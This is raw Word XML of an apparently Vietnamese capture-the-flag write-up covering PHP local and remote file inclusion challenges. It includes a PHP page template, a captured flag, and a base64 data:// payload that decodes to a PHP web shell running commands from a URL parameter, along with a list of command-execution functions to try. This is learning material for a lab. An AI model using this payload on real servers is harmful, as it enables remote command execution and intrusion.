    <w:p w14:paraId="3AA18DA8" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C428DE" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A60A764" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09025989" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;meta charset="utf-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3184B5" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;title&gt;J. Smith - CV&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BCE67A" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E29E2E" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB059C" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;?= $conf['global_style'] ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672DC4F" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A83BD" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;a href="index.php?page=home"&gt;Home&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CB69D" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;a href="index.php?page=cv" class="active"&gt;CV&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A966D6A" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;a href="index.php?page=contact"&gt;Contact&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0672D" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB32A4C" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;h1&gt;&lt;?= $conf['contact']['firstname'] ?&gt; &lt;?= $conf['contact']['lastname'] ?&gt;&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A96AD" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;h3&gt;Professional doer&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423485B" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;?= $conf['cv']['gender'] ? "Male" : "Female" ?&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089BBF47" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;?= date('Y/m/d', $conf['cv']['birth']) ?&gt; (&lt;?= date('Y')-date('Y', $conf['cv']['birth']) ?&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A05AFC7" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27354CD9" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      foreach ($conf['cv']['jobs'] as $job) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1D55B" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F2EA90" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;div class="job"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301D5C5F" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h4&gt;&lt;?= $job['title'] ?&gt; - &lt;span class="date"&gt;&lt;?= $job['date'] ?&gt;&lt;/span&gt;&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D7BFB" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A335D" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D12EE9" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0155FF" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4CD7B3" w14:textId="77777777" w:rsidR="0035412F" w:rsidRPr="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E6176" w14:textId="52ECED6C" w:rsidR="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D3CF8" w14:textId="21F8F626" w:rsidR="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6707D38A" w14:textId="171E5202" w:rsidR="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Điểm đáng chú ý là ngoài cv, home, contact hay index.php thì còn có 1 file khác là conf.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CD36C" w14:textId="1D843791" w:rsidR="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình thử đọc source nó thử bằng php filter luôn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454701F" w14:textId="463E069A" w:rsidR="0035412F" w:rsidRDefault="0035412F" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035412F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag: </w:t>
      </w:r>
      <w:r w:rsidR="0034784B" w:rsidRPr="0034784B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Th1sIsTh3Fl4g!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54900FB8" w14:textId="35B7F484" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2C2A4B" w14:textId="5E85B9B9" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034784B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thử thách 3: Remote File Inclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32E737" w14:textId="3FC1A3F3" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BB8370" w14:textId="43054786" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034784B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> là lấy được source php. Nhớ là file source ko phải lúc nào cũng là index.php nha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95B6D2" w14:textId="77777777" w:rsidR="0034784B" w:rsidRPr="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC48CD1" w14:textId="4CA9A94B" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412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Bài này lỗi rất giống với bài trên. Nhưng ứng dụng thêm đuôi khác là _lang.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D089A6" w14:textId="569379A5" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412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Do mình vẫn không bt cách xử lí lỗi này hay up web shell gì nên làm rất mất tg. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE833C" w14:textId="2BED7BE6" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B6FDFF" w14:textId="6715369C" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412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Rõ ràng cách khai thác cơ bản là không thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCDB22" w14:textId="3496CFFD" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412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Thử với PHP filter thì mình mới bt là nó chỉ dành cho lfi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5F9F9" w14:textId="754DA8F0" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412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Mình bối rối quá ko bt rfi xử lí sao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F56ED8F" w14:textId="4DCBC089" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412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Nó cứ báo lỗi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDCBE67" w14:textId="08814C0A" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005129E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>include(): Failed opening 'cv.inc.php' for inclusion (include_path='.:/usr/share/php') in &lt;b&gt;/challenge/web-serveur/ch45/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634ECE35" w14:textId="6149B865" w:rsidR="0034784B" w:rsidRDefault="0034784B" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6433DF2B" w14:textId="4B5D0C25" w:rsidR="0034784B" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình chơi may rủi thử các payload của wrapper trên “payloads all the thing” vào thì </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAC5DD" w14:textId="4BA7C879" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Oh my god! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2AC69" w14:textId="77777777" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D40261" w14:textId="6C60B5C5" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="00A60B5E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60B5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload: data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDCD02C" w14:textId="77777777" w:rsidR="00A60B5E" w:rsidRPr="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="00A60B5E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176C198F" w14:textId="77777777" w:rsidR="00A60B5E" w:rsidRPr="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="00A60B5E">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60B5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NOTE: the payload is "&lt;?php system($_GET['cmd']);echo 'Shell done !'; ?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7628E6" w14:textId="512AEC18" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B032D3" w14:textId="55B49523" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nó đã báo một lỗi khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C8ED2" w14:textId="77777777" w:rsidR="00A60B5E" w:rsidRPr="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="00A60B5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning: system() has been disabled for security reasons in data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=_lang.php on line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA4C84" w14:textId="5FF87893" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="00A60B5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shell done !%jx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A368EAB" w14:textId="77777777" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="00A60B5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4968DCC2" w14:textId="238DD101" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chưa làm ra nhưng đã có 1 hi vọng mới. Ứng dụng đã xử lí yêu cầu thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297E94F" w14:textId="46BDA9D1" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lệnh system() không thực thi được vì lí do bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796BAEFE" w14:textId="77777777" w:rsidR="005E005F" w:rsidRPr="005E005F" w:rsidRDefault="00A60B5E" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mình thử với các lệnh khác như: </w:t>
      </w:r>
      <w:r w:rsidR="005E005F" w:rsidRPr="005E005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>execute(), shell_exec(), passthru(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA6141" w14:textId="7331F365" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>show_source(), proc_open(), pcntl_exec(), eval() và assert()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E536266" w14:textId="00BF4AB1" w:rsidR="005E005F" w:rsidRDefault="005E005F" w:rsidP="005E005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
